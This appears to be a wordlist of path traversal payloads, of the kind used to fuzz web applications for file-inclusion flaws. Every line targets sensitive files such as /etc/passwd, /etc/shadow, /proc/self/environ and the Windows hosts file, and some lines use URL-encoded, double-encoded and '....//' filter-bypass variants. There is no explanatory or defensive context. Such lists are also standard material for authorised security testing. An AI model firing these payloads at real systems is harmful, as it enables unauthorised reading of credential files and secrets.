../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../etc/shadow
../../etc/shadow
../proc/self/environ
../../proc/self/environ
../proc/version
../proc/self/cmdline
../../windows/system32/drivers/etc/hosts
../../../../../windows/system32/drivers/etc/hosts
../local/etc/passwd
..%2Fetc%2Fpasswd
..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252Fetc%252Fpasswd
....//etc/passwd
....//....//etc/passwd
....//..//etc/passwd
